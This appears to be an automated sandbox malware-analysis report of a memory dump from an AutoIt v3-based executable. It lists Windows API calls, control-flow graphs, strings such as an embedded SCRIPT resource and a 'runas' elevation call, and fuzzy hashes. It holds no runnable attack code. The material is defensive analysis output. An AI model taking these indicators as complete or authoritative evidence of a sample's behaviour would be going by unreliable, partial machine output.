                                                                                              • GetVersionExW.KERNEL32(?), ref: 009F430D
                                                                                                • Part of subcall function 009F6B57: _wcslen.LIBCMT ref: 009F6B6A
                                                                                              • GetCurrentProcess.KERNEL32(?,00A8CB64,00000000,?,?), ref: 009F4422
                                                                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 009F4429
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll), ref: 009F4454
                                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 009F4466
                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 009F4474
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 009F447B
                                                                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 009F44A0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                              • API String ID: 3290436268-3101561225
                                                                                              • Opcode ID: 59d3561e99c221c7b9f3929946a67dbb48ab296654a602d3019ef4b58ccd4e90
                                                                                              • Instruction ID: 58bf95bd06ffcada4f669d7ffdae525ef5af588af84e234d34f29e720c1389ae
                                                                                              • Opcode Fuzzy Hash: 59d3561e99c221c7b9f3929946a67dbb48ab296654a602d3019ef4b58ccd4e90
                                                                                              • Instruction Fuzzy Hash: 33A1E572B1E2C4CFCB52D7E97C859A63FE46B63308B065998E041AFB23D234450BDB21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 647 9f42a2-9f42ba CreateStreamOnHGlobal 648 9f42bc-9f42d3 FindResourceExW 647->648 649 9f42da-9f42dd 647->649 650 9f42d9 648->650 651 a335ba-a335c9 LoadResource 648->651 650->649 651->650 652 a335cf-a335dd SizeofResource 651->652 652->650 653 a335e3-a335ee LockResource 652->653 653->650 654 a335f4-a33612 653->654 654->650
                                                                                              APIs
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 009F42B2
                                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,009F50AA,?,?,00000000,00000000), ref: 009F42C9
                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,009F50AA,?,?,00000000,00000000,?,?,?,?,?,?,009F4F20), ref: 00A335BE
                                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,009F50AA,?,?,00000000,00000000,?,?,?,?,?,?,009F4F20), ref: 00A335D3
                                                                                              • LockResource.KERNEL32(009F50AA,?,?,009F50AA,?,?,00000000,00000000,?,?,?,?,?,?,009F4F20,?), ref: 00A335E6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                              • String ID: SCRIPT
                                                                                              • API String ID: 3051347437-3967369404
                                                                                              • Opcode ID: 35cdc09542428b1829dd8c533f441afc20f6771a5fc709e672f2573f93471bf3
                                                                                              • Instruction ID: 87e08c03e16c4d77d6bd6ca3aaf8e98d1f1deff7aba23d8c55ee9c4c4b06e8d8
                                                                                              • Opcode Fuzzy Hash: 35cdc09542428b1829dd8c533f441afc20f6771a5fc709e672f2573f93471bf3
                                                                                              • Instruction Fuzzy Hash: 9C117971200704BFEB219BA5DC48FA77BBDEBC5B61F208569B512966A0EB71D8018B30
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009F2B6B
                                                                                                • Part of subcall function 009F3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00AC1418,?,009F2E7F,?,?,?,00000000), ref: 009F3A78
                                                                                                • Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD
                                                                                              • GetForegroundWindow.USER32 ref: 00A32C10
                                                                                              • ShellExecuteW.SHELL32(00000000,?,?,00AB2224), ref: 00A32C17
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                              • String ID: runas
                                                                                              • API String ID: 448630720-4000483414
                                                                                              • Opcode ID: 0f4433c44bb2cd484448acaa67a936d4febe723f904db34f2b62d36f17a4c66d
                                                                                              • Instruction ID: 41d9ff13bb167e99d790ef6f6a00f1be03e2ab0b5133200623d84857eb5a0eb6
                                                                                              • Opcode Fuzzy Hash: 0f4433c44bb2cd484448acaa67a936d4febe723f904db34f2b62d36f17a4c66d
                                                                                              • Instruction Fuzzy Hash: 1211B1312083096AC705FF70D852FBEBBA8ABD2351F44582DF686520A3DF758A4A8712
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,00A35222), ref: 00A5DBCE
                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 00A5DBDD
                                                                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00A5DBEE
                                                                                              • FindClose.KERNEL32(00000000), ref: 00A5DBFA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2695905019-0
                                                                                              • Opcode ID: 6b8a0dbee5a66e23a4f127c7ca193a8ad59b3c4ed016d196f9dbcaecbe11a7ed
                                                                                              • Instruction ID: b385cc54c271aaaf1b725f90961d515ac1b5b1df539baeb54d1362b1bd9921c7
                                                                                              • Opcode Fuzzy Hash: 6b8a0dbee5a66e23a4f127c7ca193a8ad59b3c4ed016d196f9dbcaecbe11a7ed
                                                                                              • Instruction Fuzzy Hash: 88F03031814914A7C230ABB8AD4D8AE77ACAE41336B544706F876C21E0FBB0595A8AA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00A1E505), ref: 00A2337E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$FileSystem
                                                                                              • String ID: GetSystemTimePreciseAsFileTime
                                                                                              • API String ID: 2086374402-595813830
                                                                                              • Opcode ID: b051fdb4ec7ba35d02a640eaa0c150f37834c532152752b332cabece67120a70
                                                                                              • Instruction ID: 00d6027a1312ac947b9851c32e2591fcb2d065c840937d31521f3c81706d035b
                                                                                              • Opcode Fuzzy Hash: b051fdb4ec7ba35d02a640eaa0c150f37834c532152752b332cabece67120a70
                                                                                              • Instruction Fuzzy Hash: EFE0E531B40328BBDB10EBA8AD02EBEBBE0EF45B60B400169F8055F651CD714E419BD5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 00A109DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 31563eb84b1d2bfac95a4a17bbed67b1ece78b69e3c19f520368ddffce529252
                                                                                              • Instruction ID: 753217053185706b72aa37459285e5d86b19427790ed16fe9c29151accaf1c2c
                                                                                              • Opcode Fuzzy Hash: 31563eb84b1d2bfac95a4a17bbed67b1ece78b69e3c19f520368ddffce529252
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetInputState.USER32 ref: 009FD807
                                                                                              • timeGetTime.WINMM ref: 009FDA07
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009FDB28
                                                                                              • TranslateMessage.USER32(?), ref: 009FDB7B
                                                                                              • DispatchMessageW.USER32(?), ref: 009FDB89
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009FDB9F
                                                                                              • Sleep.KERNEL32(0000000A), ref: 009FDBB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                              • String ID:
                                                                                              • API String ID: 2189390790-0
                                                                                              • Opcode ID: 4c4d715b90e59f9be59e78b411cf5c6ad7f90cc1fbf6910177655deb80dd3a25
                                                                                              • Instruction ID: bdd140cfaacd9c9f1bf8169563d8ebb23663976e278653c774d8d2f6b1c7305d
                                                                                              • Opcode Fuzzy Hash: 4c4d715b90e59f9be59e78b411cf5c6ad7f90cc1fbf6910177655deb80dd3a25
                                                                                              • Instruction Fuzzy Hash: D042123060934ADFD728CF24C884B7AB7E6BF85314F54892DF69587291C774E885CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32 ref: 009F2D07
                                                                                              • RegisterClassExW.USER32(00000030), ref: 009F2D31
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009F2D42
                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 009F2D5F
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009F2D6F
                                                                                              • LoadIconW.USER32 ref: 009F2D85
                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009F2D94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                              • API String ID: 2914291525-1005189915
                                                                                              • Opcode ID: 090a1b26a9c76f30a856347717e3d00513d75bfb38ca47b1afb06f50ae887bdc
                                                                                              • Instruction ID: 4c66216abdcf3fe4cc48893dfb5b1464a92f7487059917705d8825c53d9ddb05
                                                                                              • Opcode Fuzzy Hash: 090a1b26a9c76f30a856347717e3d00513d75bfb38ca47b1afb06f50ae887bdc
                                                                                              • Instruction Fuzzy Hash: F221C2B5A01318AFDB00DFE4EC89BDDBBB4FB09714F10811AFA11A62A1D7B14546CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 305 a3065b-a3068b call a3042f 308 a306a6-a306b2 call a25221 305->308 309 a3068d-a30698 call a1f2c6 305->309 315 a306b4-a306c9 call a1f2c6 call a1f2d9 308->315 316 a306cb-a30714 call a3039a 308->316 314 a3069a-a306a1 call a1f2d9 309->314 325 a3097d-a30983 314->325 315->314 323 a30781-a3078a GetFileType 316->323 324 a30716-a3071f 316->324 329 a307d3-a307d6 323->329 330 a3078c-a307bd GetLastError call a1f2a3 CloseHandle 323->330 327 a30721-a30725 324->327 328 a30756-a3077c GetLastError call a1f2a3 324->328 327->328 334 a30727-a30754 call a3039a 327->334 328->314 332 a307d8-a307dd 329->332 333 a307df-a307e5 329->333 330->314 344 a307c3-a307ce call a1f2d9 330->344 337 a307e9-a30837 call a2516a 332->337 333->337 338 a307e7 333->338 334->323 334->328 348 a30847-a3086b call a3014d 337->348 349 a30839-a30845 call a305ab 337->349 338->337 344->314 355 a3087e-a308c1 348->355 356 a3086d 348->356 349->348 354 a3086f-a30879 call a286ae 349->354 354->325 358 a308c3-a308c7 355->358 359 a308e2-a308f0 355->359 356->354 358->359 361 a308c9-a308dd 358->361 362 a308f6-a308fa 359->362 363 a3097b 359->363 361->359 362->363 364 a308fc-a3092f CloseHandle call a3039a 362->364 363->325 367 a30963-a30977 364->367 368 a30931-a3095d GetLastError call a1f2a3 call a25333 364->368 367->363 368->367
                                                                                              APIs
                                                                                                • Part of subcall function 00A3039A: CreateFileW.KERNELBASE(00000000,00000000,?,00A30704,?,?,00000000), ref: 00A303B7
                                                                                              • GetLastError.KERNEL32 ref: 00A3076F
                                                                                              • __dosmaperr.LIBCMT ref: 00A30776
                                                                                              • GetFileType.KERNELBASE ref: 00A30782
                                                                                              • GetLastError.KERNEL32 ref: 00A3078C
                                                                                              • __dosmaperr.LIBCMT ref: 00A30795
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A307B5
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A308FF
                                                                                              • GetLastError.KERNEL32 ref: 00A30931
                                                                                              • __dosmaperr.LIBCMT ref: 00A30938
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                              • String ID: H
                                                                                              • API String ID: 4237864984-2852464175
                                                                                              • Opcode ID: 864c29d28a88e06ff01167997cddd63d5ade5bc6f390f1b5e8915a481c391c32
                                                                                              • Instruction ID: 035e991010829cc2ecffa6eeab3835f4e2c089db20e232b835d28b48f626363b
                                                                                              • Opcode Fuzzy Hash: 864c29d28a88e06ff01167997cddd63d5ade5bc6f390f1b5e8915a481c391c32
                                                                                              • Instruction Fuzzy Hash: 3DA10232A041488FDF19EFB8D862FAE7BA0EB06320F14015DF8259F291DB359953CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 009F3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00AC1418,?,009F2E7F,?,?,?,00000000), ref: 009F3A78
                                                                                                • Part of subcall function 009F3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 009F3379
                                                                                              • RegOpenKeyExW.KERNEL32 ref: 009F356A
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A3318D
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 00A331CE
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00A33210
                                                                                              • _wcslen.LIBCMT ref: 00A33277
                                                                                              • _wcslen.LIBCMT ref: 00A33286
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                              • API String ID: 98802146-2727554177
                                                                                              • Opcode ID: 3bb670d8d1574d43e552ba86be1839a02ce902e8957739cec068b8720e5b3479
                                                                                              • Instruction ID: bc92d0a379e2461741a929da6895f0ef01d67efd52dbad8f474b4d833593c8b9
                                                                                              • Opcode Fuzzy Hash: 3bb670d8d1574d43e552ba86be1839a02ce902e8957739cec068b8720e5b3479
                                                                                              • Instruction Fuzzy Hash: 5271C2714083449EC714EFA5DC81EABBBE8FFD4340F41092EF5459B2A0EB749A49CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32 ref: 009F2B8E
                                                                                              • LoadCursorW.USER32 ref: 009F2B9D
                                                                                              • LoadIconW.USER32 ref: 009F2BB3
                                                                                              • LoadIconW.USER32 ref: 009F2BC5
                                                                                              • LoadIconW.USER32 ref: 009F2BD7
                                                                                              • LoadImageW.USER32 ref: 009F2BEF
                                                                                              • RegisterClassExW.USER32(?), ref: 009F2C40
                                                                                                • Part of subcall function 009F2CD4: GetSysColorBrush.USER32 ref: 009F2D07
                                                                                                • Part of subcall function 009F2CD4: RegisterClassExW.USER32(00000030), ref: 009F2D31
                                                                                                • Part of subcall function 009F2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009F2D42
                                                                                                • Part of subcall function 009F2CD4: InitCommonControlsEx.COMCTL32(?), ref: 009F2D5F
                                                                                                • Part of subcall function 009F2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009F2D6F
                                                                                                • Part of subcall function 009F2CD4: LoadIconW.USER32 ref: 009F2D85
                                                                                                • Part of subcall function 009F2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 009F2D94
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                              • String ID: #$0$AutoIt v3
                                                                                              • API String ID: 423443420-4155596026
                                                                                              • Opcode ID: 058d1d988e57968e859013d3c5213bbcbd69adcee553262ba6d86ded04fc1b9d
                                                                                              • Instruction ID: 5b0912aed28d1243c23b53fe5e619b1ae0524bd9bd689362c3f2a42929efcb5f
                                                                                              • Opcode Fuzzy Hash: 058d1d988e57968e859013d3c5213bbcbd69adcee553262ba6d86ded04fc1b9d
                                                                                              • Instruction Fuzzy Hash: B4213870E00358ABDB50DFE5EC49FAA7FB4FB49B58F01001AEA00AA7A1D3B54552CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 446 9f3170-9f3185 447 9f3187-9f318a 446->447 448 9f31e5-9f31e7 446->448 449 9f318c-9f3193 447->449 450 9f31eb 447->450 448->447 451 9f31e9 448->451 455 9f3199-9f319e 449->455 456 9f3265-9f326d PostQuitMessage 449->456 453 a32dfb-a32e23 call 9f18e2 call a0e499 450->453 454 9f31f1-9f31f6 450->454 452 9f31d0-9f31d8 DefWindowProcW 451->452 462 9f31de-9f31e4 452->462 492 a32e28-a32e2f 453->492 457 9f321d-9f3244 SetTimer RegisterWindowMessageW 454->457 458 9f31f8-9f31fb 454->458 460 9f31a4-9f31a8 455->460 461 a32e7c-a32e90 call a5bf30 455->461 463 9f3219-9f321b 456->463 457->463 467 9f3246-9f3251 CreatePopupMenu 457->467 464 9f3201-9f3214 KillTimer call 9f30f2 call 9f3c50 458->464 465 a32d9c-a32d9f 458->465 468 9f31ae-9f31b3 460->468 469 a32e68-a32e77 call a5c161 460->469 461->463 487 a32e96 461->487 463->462 464->463 477 a32da1-a32da5 465->477 478 a32dd7-a32df6 MoveWindow 465->478 467->463 474 9f31b9-9f31be 468->474 475 a32e4d-a32e54 468->475 469->463 485 9f31c4-9f31ca 474->485 486 9f3253-9f3263 call 9f326f 474->486 475->452 481 a32e5a-a32e63 call a50ad7 475->481 479 a32da7-a32daa 477->479 480 a32dc6-a32dd2 SetFocus 477->480 478->463 479->485 488 a32db0-a32dc1 call 9f18e2 479->488 480->463 481->452 485->452 485->492 486->463 487->452 488->463 492->452 496 a32e35-a32e48 call 9f30f2 call 9f3837 492->496 496->452
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,009F316A,?,?), ref: 009F31D8
                                                                                              • KillTimer.USER32 ref: 009F3204
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 009F3227
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,009F316A,?,?), ref: 009F3232
                                                                                              • CreatePopupMenu.USER32 ref: 009F3246
                                                                                              • PostQuitMessage.USER32 ref: 009F3267
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                              • String ID: TaskbarCreated
                                                                                              • API String ID: 129472671-2362178303
                                                                                              • Opcode ID: 07e3008fb2f11e2e50fef7a1514c971baf5e1c33e72bb4db39468ae87d546d1d
                                                                                              • Instruction ID: f56b087bf01bb2ac15d45523d3514a3b5c90574ba39efeba7af11e707cde085f
                                                                                              • Opcode Fuzzy Hash: 07e3008fb2f11e2e50fef7a1514c971baf5e1c33e72bb4db39468ae87d546d1d
